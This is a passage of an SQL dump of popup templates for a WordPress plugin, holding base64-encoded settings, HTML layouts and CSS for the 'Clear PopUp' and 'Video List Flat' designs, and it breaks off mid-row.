border: 8px solid [bg_color_0];\r\n  	[endif]\r\n  	border-radius: 5px;\r\n  	padding: 0;\r\n  	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	top: 15px;\r\n  	right: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}','pdf-popup.jpg',1,1,1,6,0,0,0,'2015-01-10 17:59:43',33,0),(38,'Clear PopUp',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTU6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjIxOiJoaWRlX2Zvcl9kZXZpY2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9mb3JfcG9zdF90eXBlc19zaG93IjtzOjE6IjAiO3M6MTc6ImhpZGVfZm9yX2lwc19zaG93IjtzOjE6IjAiO3M6MTI6ImhpZGVfZm9yX2lwcyI7czowOiIiO3M6MjM6ImhpZGVfZm9yX2NvdW50cmllc19zaG93IjtzOjE6IjAiO3M6MjM6ImhpZGVfZm9yX2xhbmd1YWdlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YToyNDp7czo1OiJ3aWR0aCI7czozOiI0MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czoxOiIxIjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czoxMDoiZm9udF9sYWJlbCI7czo3OiJkZWZhdWx0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiNjNmMzYzMiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzAiO3M6NzoiI2M2YzNjMyI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiI2M2YzNjMyI7czo5OiJjbG9zZV9idG4iO3M6NDoibm9uZSI7czoxMToibGF5ZXJlZF9wb3MiO3M6MDoiIjtzOjk6ImVuYl9sYWJlbCI7czoxOiIxIjtzOjU6ImxhYmVsIjtzOjExOiJDbGVhciBQb3BVcCI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJlbmJfYnRuXzAiO3M6MToiMSI7czo5OiJidG5fdHh0XzAiO3M6MTQ6IkNsaWNrIHRvIENsb3NlIjtzOjk6ImJ0bl91cmxfMCI7czoxOiIjIjtzOjE0OiJpc19jbG9zZV9idG5fMCI7czoxOiIxIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjU6InR4dF8wIjtzOjE0NjoiPHA+SnVzdCBTaW1wbGUgYW5kIENsZWFyIEZ1bGwgU2NyZWVuIFBvcFVwLiBZb3UgY2FuIGFkZCBhbnkgdGV4dCwgQUQgb3IgRGlzY2xhaW1lcnMgaGVyZS4gSW5zZXJ0IGFueSBJbWFnZXMsIFZpZGVvcyBvciBhbnl0aGluZyB5b3UgbmVlZCBoZXJlLjwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjM6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjEiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMSI7czoxMToiYnRuc19udW1iZXIiO3M6MToiMSI7fX0=','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		[if enb_label]\r\n			<div class=\"ppsPopupLabel\">[label]</div>\r\n		[endif]\r\n		[if enb_txt_0]\r\n			<div class=\"ppsPopupTxt ppsPopupTxt_0\">[txt_0]</div>\r\n		[endif]\r\n		[if enb_btn_0]\r\n      		<a class=\"ppsBtn ppsBtn_0[if is_close_btn_0] ppsPopupClose[endif]\" href=\"[btn_url_0]\">[btn_txt_0]</a>\r\n      	[endif]\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \"Open Sans\",arial;\r\n	font-size: 16px;\r\n	line-height: 1.475;\r\n	font-weight: normal;\r\n	color: #fff;\r\n  	text-shadow: 1px 1px 1px #000000;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	background-color: transparent;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	font-size: 32px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsBtn {\r\n  	display: inline;\r\n  	margin: 0;\r\n  	padding: 5px 20px;\r\n  	border-radius: 5px;\r\n  	transition-duration: 0.3s;\r\n  	text-decoration: none !important;\r\n  	color: #fff;\r\n  	font-size: 24px;\r\n  	border: 1px solid #000;\r\n  	color: #000;\r\n  	[if bg_type_0 == \'color\']\r\n	background:  [bg_color_0]; /* Old browsers */\r\nbackground: -moz-linear-gradient(top,   {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* FF3.6-15 */\r\nbackground: -webkit-linear-gradient(top,   {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* Chrome10-25,Safari5.1-6 */\r\nbackground: linear-gradient(to bottom,   {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%,[bg_color_0] 100%); /* W3C, IE10+, FF16+, Chrome26+, Opera12+, Safari7+ */\r\nfilter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\' {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=0 ); /* IE6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsBtn:hover,\r\n#ppsPopupShell_[ID] .ppsBtn:active {\r\n	[if bg_type_0 == \'color\']\r\n	/* Permalink - use to edit and share this gradient: http://colorzilla.com/gradient-editor/ [bg_color_0]+0,7db9e8+100 */\r\nbackground:  {{ adjust_brightness(popup.params.tpl.bg_color_0, -50) }}; /* Old browsers */\r\nbackground: -moz-linear-gradient(top,   [bg_color_0] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -50) }} 100%); /* FF3.6-15 */\r\nbackground: -webkit-linear-gradient(top,   [bg_color_0] 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, -50) }} 100%); /* Chrome10-25,Safari5.1-6 */\r\nbackground: linear-gradient(to bottom,   [bg_color_0] 0%,{{ adjust_brightness(popup.params.tpl.bg_color_0, -50) }} 100%); /* W3C, IE10+, FF16+, Chrome26+, Opera12+, Safari7+ */\r\nfilter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\' [bg_color_0]\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, -50) }}\',GradientType=0 ); /* IE6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	box-shadow: 1px 2px 1px #333;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	display: inline !important;\r\n}','clear-popup.jpg',1,1,1,8,0,0,0,'2015-01-10 17:59:43',21,0),(39,'Video List Flat',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoxMDoic2hvd19wYWdlcyI7czozOiJhbGwiO3M6MTQ6InNob3dfdGltZV9mcm9tIjtzOjc6IjEyOjAwYW0iO3M6MTI6InNob3dfdGltZV90byI7czo3OiIxMjowMGFtIjtzOjE0OiJzaG93X2RhdGVfZnJvbSI7czowOiIiO3M6MTI6InNob3dfZGF0ZV90byI7czowOiIiO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoxNToiY291bnRfdGltZXNfbnVtIjtzOjE6IjEiO3M6MTU6ImNvdW50X3RpbWVzX21lcyI7czozOiJkYXkiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7czoyNDoiaGlkZV9zZWFyY2hfZW5naW5lc19zaG93IjtzOjE6IjAiO3M6MTg6ImhpZGVfcHJlZ191cmxfc2hvdyI7czoxOiIwIjtzOjEzOiJoaWRlX3ByZWdfdXJsIjtzOjA6IiI7czoyNDoiaGlkZV9mb3JfdXNlcl9yb2xlc19zaG93IjtzOjE6IjAiO31zOjM6InRwbCI7YTo1Njp7czo5OiJ2aWRlb191cmwiO3M6NDM6Imh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL3dhdGNoP3Y9bktJdTl5ZW41bmMiO3M6NToid2lkdGgiO3M6MzoiODI0IjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjY6ImhlaWdodCI7czozOiI0MDAiO3M6MTQ6ImhlaWdodF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ViZWJlYiI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiMwNjZkYWIiO3M6OToiYmdfdHlwZV8yIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18yIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMiI7czo3OiIjMDAwNjNmIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzAwMDAwMCI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzU4NTg1OCI7czoxNToicmVzcG9uc2l2ZV9tb2RlIjtzOjM6ImRlZiI7czoxNzoicmVpZHJlY3Rfb25fY2xvc2UiO3M6MDoiIjtzOjk6ImNsb3NlX2J0biI7czoyNzoiY2xvc2UtYmxhY2staW4td2hpdGUtY2lyY2xlIjtzOjExOiJsYXllcmVkX3BvcyI7czowOiIiO3M6NToibGFiZWwiO3M6NTk6IkNoZWNrIHZpZGVvIGFuZCA8aSBzdHlsZT1cImNvbG9yOiAjYzIyNTJmO1wiPnN1YnNjcmliZSE8L2k+IjtzOjEzOiJlbmJfZm9vdF9ub3RlIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjExODoiV2UgcmVzcGVjdCB5b3VyIHByaXZhY3kuIFlvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lICI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjY6InNpbXBsZSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fXM6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTaWduLXVwISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfc3ViamVjdCI7czo0MDoiTmV3IFN1YnNjcmliZXIgb24gTXkgV29yZFByZXNzIFRlc3QgU2l0ZSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSBpcyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjt9czoxMDoib3B0c19hdHRycyI7YTozOntzOjk6ImJnX251bWJlciI7czoxOiIzIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjAiO3M6MjE6InZpZGVvX2hlaWdodF9hc19wb3B1cCI7czoxOiIxIjt9fQ==','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				<div style=\"clear: both;\"></div>\r\n			[endif]\r\n			<div class=\"ppsPopupVideo \">\r\n				[video_html]\r\n			</div>\r\n			<div style=\"clear: both;\"></div>\r\n		</div>\r\n		<div class=\"ppsRightCol\">\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			[if enb_sm]\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] iframe {\r\n	width: 100% !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 66%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-family: \"Myriad Pro\",\"Trebuchet MS\",\"Helvetica Neue\",Helvetica,Arial,Sans-Serif;\r\n	font-size: 30px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	font-weight: bold;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n	text-shadow: 0px 0px 1px #000;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	display: table-cell;\r\n  	width: 34%;\r\n  	height: 100%;\r\n  	vertical-align: top;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ie10+ */\r\n  background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\', endColorstr=\'[bg_color_1]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 30px 30px 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 5px;\r\n  	height: 40px;\r\n  	border: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	background-color: #fff;\r\n  	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	margin-left: -5px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/mail-icon.png\");\r\n  	background-repeat: no-repeat;\r\n  	background-position: 90% center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n  	[if bg_type_2 == \'color\']\r\n  	background-color: [bg_color_2];\r\n  	background-image: none;\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 2px 2px 2px #000;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupVideo {\r\n  	width: 100%;\r\n  	line-height: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}','video-list-flat.jpg',1,1,1,3,0,0,0,'2015-01-10 17:59:43',17,0),(40,'List Building 